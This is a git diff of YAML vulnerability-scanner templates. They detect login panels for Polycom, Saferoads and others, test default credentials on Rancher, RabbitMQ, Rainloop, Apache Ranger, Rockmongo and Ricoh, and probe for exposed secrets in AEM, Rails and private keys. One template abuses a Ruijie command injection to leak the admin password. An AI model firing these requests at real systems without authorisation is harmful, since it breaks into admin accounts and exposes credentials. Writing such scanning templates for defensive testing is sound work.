/dev/null +++ b/poc/auth/polycom-login-9627.yaml @@ -0,0 +1,21 @@ +id: polycom-login +info: + name: Polycom Login + author: DhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6863 + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/login.html" + matchers-condition: and + matchers: + - type: word + words: + - "Polycom Login" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/polycom-login.yaml b/poc/auth/polycom-login.yaml index ec8f498c53..f2341a845d 100644 --- a/poc/auth/polycom-login.yaml +++ b/poc/auth/polycom-login.yaml @@ -1,21 +1,34 @@ id: polycom-login + info: - name: Polycom Login + name: Polycom Login Panel - Detect author: DhiyaneshDk severity: info + description: Polycom login panel was detected. reference: - https://www.exploit-db.com/ghdb/6863 - tags: panel -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel + +http: - method: GET path: - "{{BaseURL}}/login.html" + matchers-condition: and matchers: - type: word words: - "Polycom Login" part: body + - type: status status: - 200 + +# digest: 4a0a0047304502202140972e05f30b61614cde26fcb94562cca5b1136d02aa23272a2f1b29893377022100a77cc0a4be6d7dcaea2eabf10076816a047789a25faf44e38f41b16b94d7fd00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/possible-AEM-secrets.yaml b/poc/auth/possible-AEM-secrets.yaml deleted file mode 100644 index 198c19fcd3..0000000000 --- a/poc/auth/possible-AEM-secrets.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: aem-secrets - -info: - name: AEM Secrets - Sensitive Information Disclosure - author: boobooHQ,j3ssie - severity: high - description: | - Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ - metadata: - verified: true - max-request: 2 - tags: aem,adobe,misconfig,exposure - -http: - - method: GET - path: - - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"jcr:uuid"' - - '"jcr:createdBy"' - - '"uri"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100f26aef400ffc895f1d84d377c7c8889af3a56490902382de4d7e2504f59b48bc02210090f54e744e9f760d4a740a9b6d7fe6a61d4904e4823b4d43318598fd8b2b10ce:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/private-key-9655.yaml b/poc/auth/private-key-9655.yaml index 3e779effd4..282a2ab3a0 100644 --- a/poc/auth/private-key-9655.yaml +++ b/poc/auth/private-key-9655.yaml @@ -1,15 +1,12 @@ id: private-key - info: name: Private Key Detect author: gaurang,geeknik severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: diff --git a/poc/auth/project-insight-login.yaml b/poc/auth/project-insight-login.yaml index cc38d84bec..25ca7743a1 100644 --- a/poc/auth/project-insight-login.yaml +++ b/poc/auth/project-insight-login.yaml @@ -1,23 +1,35 @@ id: project-insight-login + info: - name: Project Insight - Login + name: Project Insight Login Panel - Detect author: dhiyaneshDk severity: info + description: Project Insight login panel was detected. reference: - https://www.exploit-db.com/ghdb/7413 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Project Insight - Login" - tags: panel -requests: + tags: panel,edb + +http: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: - type: word part: body words: - "Project Insight - Login" + - type: status status: - 200 + +# digest: 4a0a004730450220101009023509eb13aaf56447e9cbbb0110d2919060f5830f081b9411ff8b2c88022100e6962fcfd9c3c738f7b95bca52cef9a2338266fe4a7eaea468b990eeb1274141:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pure-storage-login.yaml b/poc/auth/pure-storage-login.yaml index e7bbc2ea59..ff24e5c6a3 100644 --- a/poc/auth/pure-storage-login.yaml +++ b/poc/auth/pure-storage-login.yaml @@ -1,32 +1,20 @@ id: pure-storage-login - info: - name: Pure Storage Login Panel - Detect + name: Pure Storage Login author: dhiyaneshDK severity: info - description: Pure Storage login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 - shodan-query: http.title:"Pure Storage Login" + shodan-query: 'http.title:"Pure Storage Login"' tags: panel,purestorage - -http: +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'Pure Storage Login' - - type: status status: - 200 - -# digest: 4a0a00473045022100d24b176bc0f6e299a1546685d715f883ee304205ae646cbc43e439a831e4defa02202def8b2dac9de67ecaf199a8b19f61383664f189b17e86eab4102361c0c9d634:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/putty-private-key-disclosure-9732.yaml b/poc/auth/putty-private-key-disclosure-9730.yaml similarity index 100% rename from poc/auth/putty-private-key-disclosure-9732.yaml rename to poc/auth/putty-private-key-disclosure-9730.yaml diff --git a/poc/auth/r-webserver-login.yaml b/poc/auth/r-webserver-login.yaml index 94dfe34794..5e2be9c394 100644 --- a/poc/auth/r-webserver-login.yaml +++ b/poc/auth/r-webserver-login.yaml @@ -1,19 +1,33 @@ id: r-webserver-login + info: - name: R WebServer Login + name: R WebServer Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7132 - tags: panel,rwebserver -requests: + description: R WebServer login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7132 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel,rwebserver + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "R WebServer" + - type: status status: - 200 + +# digest: 490a00463044022065379692db243fa1d115f286378173a32b973de295c34e846b5c5ef0c3132dc50220658f791bd86e5cdfb9e31fdeb4d355ca18db17b33f97e7e6aa073bbbbdfda42a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/rabbitmq-default-login-9783.yaml b/poc/auth/rabbitmq-default-login-9783.yaml index fba1be66cd..4497061308 100644 --- a/poc/auth/rabbitmq-default-login-9783.yaml +++ b/poc/auth/rabbitmq-default-login-9783.yaml @@ -1,18 +1,10 @@ id: rabbitmq-default-login info: - name: RabbitMQ Default Login + name: RabbitMQ admin Default Login author: fyoorer,dwisiswant0 severity: high - description: RabbitMQ default admin credentials were discovered. tags: rabbitmq,default-login - reference: - - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: @@ -42,5 +34,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/rabbitmq-default-login-9786.yaml b/poc/auth/rabbitmq-default-login-9786.yaml index 9d549477c7..eb3b119d26 100644 --- a/poc/auth/rabbitmq-default-login-9786.yaml +++ b/poc/auth/rabbitmq-default-login-9786.yaml @@ -1,17 +1,9 @@ id: rabbitmq-default-login info: - name: RabbitMQ Default Login + name: RabbitMQ admin Default Login author: fyoorer,dwisiswant0 severity: high - description: RabbitMQ default admin credentials were discovered. tags: rabbitmq,default-login - reference: - - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -38,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/rails-secret-token-disclosure-9809.yaml b/poc/auth/rails-secret-token-disclosure-9809.yaml deleted file mode 100644 index 387218b6c6..0000000000 --- a/poc/auth/rails-secret-token-disclosure-9809.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: rails-secret-token-disclosure -info: - name: Ruby on Rails Secret Token Disclosure - author: dhiyaneshDk - severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json - tags: exposure,files,rails,ruby,token -requests: - - method: GET - path: - - "{{BaseURL}}/config/initializers/secret_token.rb" - matchers-condition: and - matchers: - - type: word - words: - - "secret_key_base =" - - "config.secret_token =" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/rails-secret-token-disclosure-9810.yaml b/poc/auth/rails-secret-token-disclosure-9810.yaml new file mode 100644 index 0000000000..8505b6ebc5 --- /dev/null +++ b/poc/auth/rails-secret-token-disclosure-9810.yaml @@ -0,0 +1,23 @@ +id: rails-secret-token-disclosure +info: + name: Ruby on Rails Secret Token Disclosure + author: dhiyaneshDk + severity: medium + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + tags: exposure,files,rails,ruby,token +requests: + - method: GET + path: + - "{{BaseURL}}/config/initializers/secret_token.rb" + matchers-condition: and + matchers: + - type: word + words: + - "secret_key_base =" + - "config.secret_token =" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/rails-secret-token-disclosure.yaml b/poc/auth/rails-secret-token-disclosure.yaml index 8505b6ebc5..387218b6c6 100644 --- a/poc/auth/rails-secret-token-disclosure.yaml +++ b/poc/auth/rails-secret-token-disclosure.yaml @@ -3,8 +3,7 @@ info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json tags: exposure,files,rails,ruby,token requests: - method: GET diff --git a/poc/auth/rainloop-default-login-9811.yaml b/poc/auth/rainloop-default-login-9811.yaml index 48b5f927a4..3fe1e87d21 100644 --- a/poc/auth/rainloop-default-login-9811.yaml +++ b/poc/auth/rainloop-default-login-9811.yaml @@ -1,23 +1,20 @@ id: rainloop-default-login info: - name: Rainloop WebMail - Default Admin Login + name: Rainloop WebMail Default Login author: For3stCo1d severity: high - description: Rainloop WebMail default admin login credentials were successful. - reference: - - https://github.com/RainLoop/rainloop-webmail/issues/28 + reference: https://github.com/RainLoop/rainloop-webmail/issues/28 metadata: - verified: true - max-request: 2 fofa-query: app="RAINLOOP-WebMail" - tags: default-login,rainloop,webmail,foss + tags: rainloop,webmail,default-login,foss -http: +requests: - raw: - | # Login Portal: /?admin GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} + - | POST /?/Ajax/&q[]=/0/ HTTP/2 Host: {{Hostname}} @@ -29,9 +26,11 @@ http: payloads: user: - admin + pass: - 12345 + cookie-reuse: true extractors: - type: regex name: token @@ -50,6 +49,4 @@ http: - type: status status: - - 200 - -# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950 + - 200 \ No newline at end of file diff --git a/poc/auth/rainloop-default-login.yaml b/poc/auth/rainloop-default-login.yaml new file mode 100644 index 0000000000..8e4ea4426f --- /dev/null +++ b/poc/auth/rainloop-default-login.yaml @@ -0,0 +1,44 @@ +id: rainloop-default-login +info: + name: Rainloop WebMail Default Login + author: For3stCo1d + severity: high + reference: https://github.com/RainLoop/rainloop-webmail/issues/28 + metadata: + fofa-query: app="RAINLOOP-WebMail" + tags: rainloop,webmail,default-login,foss +requests: + - raw: + - | # Login Portal: /?admin + GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /?/Ajax/&q[]=/0/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork + payloads: + user: + - admin + pass: + - 12345 + cookie-reuse: true + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - 'token":"(.+?)"' + matchers-condition: and + matchers: + - type: word + words: + - '"Action":"AdminLogin"' + - '"Result":true' + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/rancher-default-login-9814.yaml b/poc/auth/rancher-default-login-9814.yaml index 071cb9f045..a692cff35d 100644 --- a/poc/auth/rancher-default-login-9814.yaml +++ b/poc/auth/rancher-default-login-9814.yaml @@ -8,20 +8,20 @@ info: reference: - https://github.com/rancher/rancher - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + tags: default-login,rancher,kubernetes,devops,cloud classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 2 - tags: default-login,rancher,kubernetes,devops,cloud -http: +requests: - raw: - | GET /v3/settings/first-login HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + - | POST /v3-public/localProviders/local?action=login HTTP/1.1 Host: {{Hostname}} @@ -38,7 +38,6 @@ http: password: - admin attack: pitchfork - matchers-condition: and matchers: - type: status @@ -59,4 +58,4 @@ http: regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' -# digest: 4b0a00483046022100b130781bfb5cfc0f2b6cab42388fe47a3ff3661a5f8e3d4bee3a43dcee20ae4b0221008b9872679be89384dd66111bb7d0b271e17db41aaaf0cddc2ccae91a78a8c022:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rancher-default-login-9815.yaml b/poc/auth/rancher-default-login-9815.yaml index d189f6d141..071cb9f045 100644 --- a/poc/auth/rancher-default-login-9815.yaml +++ b/poc/auth/rancher-default-login-9815.yaml @@ -1,4 +1,5 @@ id: rancher-default-login + info: name: Rancher Default Login author: princechaddha @@ -11,8 +12,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 2 tags: default-login,rancher,kubernetes,devops,cloud -requests: + +http: - raw: - | GET /v3/settings/first-login HTTP/1.1 @@ -27,21 +31,25 @@ requests: Content-Length: 136 {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'R_SESS=token' part: header + extractors: - type: regex name: csrf @@ -51,4 +59,4 @@ requests: regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' -# Enhanced by mp on 2022/03/11 +# digest: 4b0a00483046022100b130781bfb5cfc0f2b6cab42388fe47a3ff3661a5f8e3d4bee3a43dcee20ae4b0221008b9872679be89384dd66111bb7d0b271e17db41aaaf0cddc2ccae91a78a8c022:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ranger-default-login-9827.yaml b/poc/auth/ranger-default-login-9827.yaml new file mode 100644 index 0000000000..34e46cbd76 --- /dev/null +++ b/poc/auth/ranger-default-login-9827.yaml @@ -0,0 +1,39 @@ +id: ranger-default-login + +info: + name: Apache Ranger Default Login + author: For3stCo1d + severity: high + reference: https://github.com/apache/ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + tags: apache,ranger,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"statusCode":200' + - '"msgDesc":"Login Successful"' + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/ranger-default-login-9828.yaml b/poc/auth/ranger-default-login-9828.yaml index 34e46cbd76..33536c3057 100644 --- a/poc/auth/ranger-default-login-9828.yaml +++ b/poc/auth/ranger-default-login-9828.yaml @@ -1,15 +1,22 @@ id: ranger-default-login info: - name: Apache Ranger Default Login + name: Apache Ranger - Default Login author: For3stCo1d severity: high - reference: https://github.com/apache/ranger + description: Apache Ranger contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/ranger + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: + max-request: 1 shodan-query: http.title:"Ranger - Sign In" tags: apache,ranger,default-login -requests: +http: - raw: - | POST /login HTTP/1.1 @@ -37,3 +44,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402203bf53c048783b3bfa9ae3b589a837d7490de17871f806fdd517ec3f32b79d9b60220319afc2bd265b8457db14da8706c7852f329078070f5b51a82132229b4b31462:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ricoh-weak-password-9880.yaml b/poc/auth/ricoh-weak-password-9880.yaml index da512f2063..55816ca5f7 100644 --- a/poc/auth/ricoh-weak-password-9880.yaml +++ b/poc/auth/ricoh-weak-password-9880.yaml @@ -4,17 +4,18 @@ info: name: Ricoh Default Login author: gy741 severity: high - tags: ricoh,default-login description: Ricoh default admin credentials were discovered. reference: - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + max-request: 1 + tags: ricoh,default-login -requests: +http: - raw: - | POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 @@ -39,4 +40,4 @@ requests: status: - 302 -# Enhanced by mp on 2022/03/11 +# digest: 490a0046304402205f1bd4059a6971b29531d16085fd70128e711082039224c7a09df177efae92e502206a2179161b61c2edd0419ce743f386a7ad9ccec0e2b79622f70ba6a9f6bd3f78:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ricoh-weak-password-9882.yaml b/poc/auth/ricoh-weak-password-9882.yaml index 55816ca5f7..4e068463c9 100644 --- a/poc/auth/ricoh-weak-password-9882.yaml +++ b/poc/auth/ricoh-weak-password-9882.yaml @@ -1,5 +1,4 @@ id: ricoh-default-login - info: name: Ricoh Default Login author: gy741 @@ -11,11 +10,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: ricoh,default-login - -http: +requests: - raw: - | POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 @@ -23,21 +19,18 @@ http: Cookie: cookieOnOffChecker=on; wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open= - payloads: username: - admin attack: pitchfork - matchers-condition: and matchers: - type: regex regex: - 'wimsesid=[0-9]+' part: header - - type: status status: - 302 -# digest: 490a0046304402205f1bd4059a6971b29531d16085fd70128e711082039224c7a09df177efae92e502206a2179161b61c2edd0419ce743f386a7ad9ccec0e2b79622f70ba6a9f6bd3f78:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rockmongo-default-login-9897.yaml b/poc/auth/rockmongo-default-login-9897.yaml new file mode 100644 index 0000000000..b8990a1d84 --- /dev/null +++ b/poc/auth/rockmongo-default-login-9897.yaml @@ -0,0 +1,47 @@ +id: rockmongo-default-login + +info: + name: Rockmongo Default Login + author: pikpikcu + severity: high + description: Rockmongo default admin credentials were discovered. + tags: rockmongo,default-login + reference: + - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + POST /index.php?action=login.index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/index.php?action=login.index + + more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "Location: /index.php?action=admin.index&host=0" + - "Set-Cookie: ROCK_LANG=" + part: header + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rockmongo-default-login-9899.yaml b/poc/auth/rockmongo-default-login-9899.yaml index c194ac4f25..eaa5d79c7b 100644 --- a/poc/auth/rockmongo-default-login-9899.yaml +++ b/poc/auth/rockmongo-default-login-9899.yaml @@ -1,4 +1,5 @@ id: rockmongo-default-login + info: name: Rockmongo Default Login author: pikpikcu @@ -10,8 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: rockmongo,default-login -requests: + +http: - raw: - | POST /index.php?action=login.index HTTP/1.1 @@ -20,12 +24,14 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word @@ -33,8 +39,9 @@ requests: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header + - type: status status: - 302 -# Enhanced by mp on 2022/03/11 +# digest: 4a0a00473045022100e38c9a57e4d88c9f038c701b6560797dad2f92de005ed2a726f7bc07660b27dd022064431cf3bab0caefb9392df1787aa92f28050b578b72c0863fab2aa1b37dc25b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/routeros-login-9908.yaml b/poc/auth/routeros-login-9909.yaml similarity index 100% rename from poc/auth/routeros-login-9908.yaml rename to poc/auth/routeros-login-9909.yaml diff --git a/poc/auth/routeros-login.yaml b/poc/auth/routeros-login.yaml deleted file mode 100644 index d4e3940ea9..0000000000 --- a/poc/auth/routeros-login.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: routeros-login -info: - name: RouterOS Router Login Detect - author: dhiyaneshDK,idealphase - severity: info - metadata: - shodan-query: http.title:"RouterOS router configuration page" - tags: panel,router,routeros -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'RouterOS router configuration page' - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - '

RouterOS v(.+)<\/h1>' diff --git a/poc/auth/rseenet-default-login-9913.yaml b/poc/auth/rseenet-default-login-9913.yaml index 8312a43357..80dfe96d37 100644 --- a/poc/auth/rseenet-default-login-9913.yaml +++ b/poc/auth/rseenet-default-login-9913.yaml @@ -1,10 +1,17 @@ id: rseenet-default-login + info: name: Advantech R-SeeNet Default Login author: princechaddha severity: high + description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. reference: https://icr.advantech.cz/products/software/r-seenet tags: rseenet,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -33,3 +40,5 @@ requests: part: body words: - "User is succesfully logged." + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rseenet-default-login-9914.yaml b/poc/auth/rseenet-default-login-9914.yaml index 13c1e85697..fb18e8e12d 100644 --- a/poc/auth/rseenet-default-login-9914.yaml +++ b/poc/auth/rseenet-default-login-9914.yaml @@ -4,13 +4,13 @@ info: author: princechaddha severity: high description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. - reference: - - https://icr.advantech.cz/products/software/r-seenet + reference: https://icr.advantech.cz/products/software/r-seenet + tags: rseenet,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: rseenet,default-login requests: - raw: - | diff --git a/poc/auth/ruijie-eg-password-leak-9922.yaml b/poc/auth/ruijie-eg-password-leak-9922.yaml deleted file mode 100644 index d2050ac470..0000000000 --- a/poc/auth/ruijie-eg-password-leak-9922.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: ruijie-eg-password-leak -info: - name: Ruijie EG Easy Gateway Password Leak - author: pikpikcu,pdteam - severity: high - description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability - reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - - https://www.ruijienetworks.com - tags: ruijie,exposure -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=admin?show+webmaster+user - matchers-condition: and - matchers: - - type: word - words: - - '"data":' - - '"status":1' - - 'admin' - condition: and - part: body - - type: word - words: - - 'text/json' - part: header - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/poc/auth/ruijie-eg-password-leak.yaml b/poc/auth/ruijie-eg-password-leak.yaml index 2cd5c661e3..d2050ac470 100644 --- a/poc/auth/ruijie-eg-password-leak.yaml +++ b/poc/auth/ruijie-eg-password-leak.yaml @@ -1,5 +1,4 @@ id: ruijie-eg-password-leak - info: name: Ruijie EG Easy Gateway Password Leak author: pikpikcu,pdteam @@ -9,7 +8,6 @@ info: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com tags: ruijie,exposure - requests: - raw: - | @@ -18,7 +16,6 @@ requests: Content-Type: application/x-www-form-urlencoded username=admin&password=admin?show+webmaster+user - matchers-condition: and matchers: - type: word @@ -28,18 +25,15 @@ requests: - 'admin' condition: and part: body - - type: word words: - 'text/json' part: header - - type: status status: - 200 - extractors: - type: regex group: 1 regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file + - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/poc/auth/saferoads-vms-login-9971.yaml b/poc/auth/saferoads-vms-login-9971.yaml deleted file mode 100644 index 7fd9a2d174..0000000000 --- a/poc/auth/saferoads-vms-login-9971.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: saferoads-vms-login - -info: - name: Saferoads VMS Login - author: dhiyaneshDk - severity: info - tags: panel - reference: https://www.exploit-db.com/ghdb/6941 - -requests: - - method: GET - path: - - '{{BaseURL}}/login.html' - matchers: - - type: word - words: - - 'Saferoads VMS' \ No newline at end of file diff --git a/poc/auth/saferoads-vms-login-9973.yaml b/poc/auth/saferoads-vms-login-9973.yaml new file mode 100644 index 0000000000..d8ae82f7ad --- /dev/null +++ b/poc/auth/saferoads-vms-login-9973.yaml @@ -0,0 +1,16 @@ +id: saferoads-vms-login +info: + name: Saferoads VMS Login + author: dhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6941 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + matchers: + - type: word + words: + - 'Saferoads VMS' diff --git a/poc/auth/saferoads-vms-login.yaml b/poc/auth/saferoads-vms-login.yaml index d8ae82f7ad..e45673c12d 100644 --- a/poc/auth/saferoads-vms-login.yaml +++ b/poc/auth/saferoads-vms-login.yaml @@ -1,16 +1,28 @@ id: saferoads-vms-login + info: - name: Saferoads VMS Login + name: Saferoads VMS Login Panel - Detect author: dhiyaneshDk severity: info + description: Saferoads VMS login panel was detected. reference: - https://www.exploit-db.com/ghdb/6941 - tags: panel -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,edb + +http: - method: GET path: - '{{BaseURL}}/login.html' + matchers: - type: word words: - 'Saferoads VMS' + +# digest: 